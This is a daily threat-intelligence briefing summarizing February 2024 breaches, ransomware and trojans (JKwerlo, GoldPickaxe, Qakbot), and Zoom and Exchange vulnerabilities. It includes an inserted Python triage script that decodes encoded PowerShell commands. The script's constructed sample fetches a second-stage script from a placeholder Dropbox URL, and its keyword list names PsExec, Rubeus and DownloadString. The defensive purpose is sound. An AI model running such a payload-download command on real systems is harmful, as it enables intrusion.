Cyware Daily Threat Intelligence


Daily Threat Briefing February 15, 2024

The illicit acquisition of biometric data presents profound risks. Recently, alleged Chinese threat actors have been detected attempting to pilfer facial biometrics to create deepfake videos that defeat bank login checks; the trojan they use for this is GoldPickaxe. Additionally, a new ransomware strain, called JKwerlo, was found targeting French and Spanish speakers in Europe. Its Go-based architecture, encoded PowerShell commands, lateral movement techniques, and evasion tactics reflect the exceptional detailing and sophistication of the cybercriminals involved.

What’s more? A critical vulnerability in Zoom desktop, VDI clients, and Meeting SDK for Windows can enable unauthenticated attackers to escalate privileges over a network. Users are urged to update to the latest releases to address this flaw and six other vulnerabilities for enhanced security.

Top Breaches Reported in the Last 24 Hours

LockBit strikes Georgia County

Fulton County, Georgia, came under attack by the LockBit ransomware group, triggering widespread IT outages affecting phone, court, and tax systems. While initial investigations didn't identify any citizen or employee data theft, LockBit threatens to publish confidential documents unless a ransom is paid by February 16. Fulton County Chair Robb Pitts confirmed disruptions in the property tax system and said the county is also facing water billing issues due to the attack.

Atlassian bug exposes employee records

A breach at the Government Accountability Office (GAO) compromised the data of thousands of employees. Cybercriminals exploited a vulnerability in the Atlassian Confluence tool. Contractor CGI Federal notified GAO of the breach affecting 6,600 individuals. Meanwhile, Atlassian urged customers to take swift action to safeguard their data.

Employee data accessed at a finance firm

Prudential Financial, a prominent global financial services firm, notified the SEC of a network breach where attackers accessed administrative and user data from certain systems. Investigations are ongoing to assess the full impact of the attack. Fortunately, there's no evidence of customer data compromise, and the breach hasn't materially impacted operations or financials.

German battery manufacturer halts production

German battery manufacturer Varta experienced a cyberattack, forcing the shutdown of its IT systems and production across five plants, including those in Germany, Romania, and Indonesia. While the nature of the attack remains undisclosed, suspicions lean toward a ransomware incident. The extent of the damage is still under assessment.

Intelligence agency spills data

The Defense Intelligence Agency of the U.S. DOD informed approximately 20,600 individuals of a data incident, compromising their sensitive emails due to a misconfigured government cloud email server hosted by Microsoft. The breach occurred between February 3 and February 20, 2023. The exposed emails contained sensitive personnel information, including data related to U.S. Special Operations Command.

Top Malware Reported in the Last 24 Hours

JKwerlo malware targets European victims

French- and Spanish-speaking victims in Europe are being targeted by JKwerlo, a Go-based ransomware variant. According to experts at Cyble, the ransomware is delivered through meticulously crafted campaigns that distribute language-specific HTML files via spam emails. JKwerlo infiltrates systems using encoded PowerShell commands, fetches payloads from Dropbox links, and relies on tools such as PsExec and Rubeus for lateral movement while evading detection.
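Encoded PowerShell is a detection opportunity: the payload is only obscured, not encrypted, so process-creation logs can be decoded in place and screened for the indicators named above. The triage below is an added example and not part of the Cyble write-up; the command lines, the `PLACEHOLDER` Dropbox path and the keyword list are constructed for illustration.

```python
"""Decode PowerShell -EncodedCommand payloads from process command lines and flag them."""
import base64
import binascii
import re

# Simplified matcher for the -EncodedCommand switch and its common abbreviations
# (-e, -ec, -enc). PowerShell itself accepts any unambiguous prefix of the switch.
ENCODED_SWITCH = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})")

# Keywords reflecting the JKwerlo reporting (Dropbox-hosted stages, PsExec/Rubeus
# for lateral movement). Constructed list for the example, not an IoC feed.
SUSPICIOUS_TOKENS = ("dropbox.com", "psexec", "rubeus", "invoke-webrequest", "downloadstring")


def encode_ps(command: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand (UTF-16LE, base64)."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries an -EncodedCommand payload, else None."""
    m = ENCODED_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError):
        return None  # not a well-formed PowerShell payload; treat as noise


def triage(cmdline: str) -> dict:
    """Classify one process command line: was it encoded, what did it say, which tokens hit."""
    decoded = decode_encoded_command(cmdline)
    hits = []
    if decoded is not None:
        lowered = decoded.lower()
        hits = [t for t in SUSPICIOUS_TOKENS if t in lowered]
    return {"encoded": decoded is not None, "decoded": decoded, "hits": hits, "alert": bool(hits)}


# Constructed sample command lines (placeholder URL and paths, not real indicators).
SAMPLES = [
    "powershell.exe -NoP -W Hidden -enc " + encode_ps(
        'Invoke-WebRequest "https://www.dropbox.com/s/PLACEHOLDER/stage2.txt" -OutFile C:\\Users\\Public\\s2.ps1'),
    "powershell.exe -EncodedCommand " + encode_ps("Get-Date"),  # encoded but benign
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",  # not encoded
]

if __name__ == "__main__":
    for line in SAMPLES:
        r = triage(line)
        print(r["alert"], r["hits"], (r["decoded"] or "")[:60])
```

Only the keyword hits raise an alert, so a plain encoded `Get-Date` is recorded as encoded but not flagged; the decoded text is kept so an analyst can read the actual script rather than the base64 blob.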

New trojan steals facial biometric data

Security researchers uncovered a sophisticated new trojan called GoldPickaxe, designed to steal facial biometric data and create deepfake videos to bypass banking logins. Developed by a suspected Chinese-speaking cybercrime group dubbed GoldFactory, the malware targets victims in Thailand and Vietnam. Once activated, the trojan intercepts SMS messages, proxies traffic, and prompts victims to record videos, enabling cybercriminals to gain unauthorized access to victims' bank accounts.

Qakbot shows signs of resurgence

Despite a major takedown by U.S. law enforcement, new samples of the Qakbot botnet malware have been observed in the wild. Spotted around mid-December, the strains feature improved encryption and evasion techniques. Security analysts discovered a small-scale campaign directed at the hospitality sector, using a PDF file purporting to come from the U.S. Internal Revenue Service.

Top Vulnerabilities Reported in the Last 24 Hours

Zoom flaw poses privilege escalation risks

Zoom's desktop and VDI clients, along with its Meeting SDK for Windows, are susceptible to a critical vulnerability discovered by Zoom's offensive security team. Identified as CVE-2024-24691 and rated 9.6 on the CVSS scale, the flaw enables unauthenticated attackers to conduct privilege escalation over a network. While specifics of exploitation remain undisclosed, user interaction is required. Zoom urges users to update to the latest versions.

Critical bugs in Exchange server

Microsoft identified critical vulnerabilities in its Exchange server, including CVE-2024-21410, which enables privilege escalation through pass-the-hash attacks. Attackers could exploit this flaw to relay a user's Net-NTLMv2 hash and gain unauthorized access. The issue stems from NTLM credential relay protection, known as Extended Protection for Authentication (EPA), not being enabled by default. Additionally, CVE-2024-21413 allows attackers to bypass Office Protected View in Outlook, posing risks of data theft and malware execution.

Top Scams Reported in the Last 24 Hours

Billions profited from malicious gambling sites

South Korea's National Intelligence Service reported that North Korea's Office 39 is selling pre-infected gambling websites to South Korean cybercrime groups. The scheme, believed to have generated billions, offers websites at $5,000/month with optional tech support for $3,000/month. The sites steal the personal data of South Korean citizens. To evade sanctions, North Koreans pose as Chinese IT workers, forging credentials and using Chinese bank accounts.
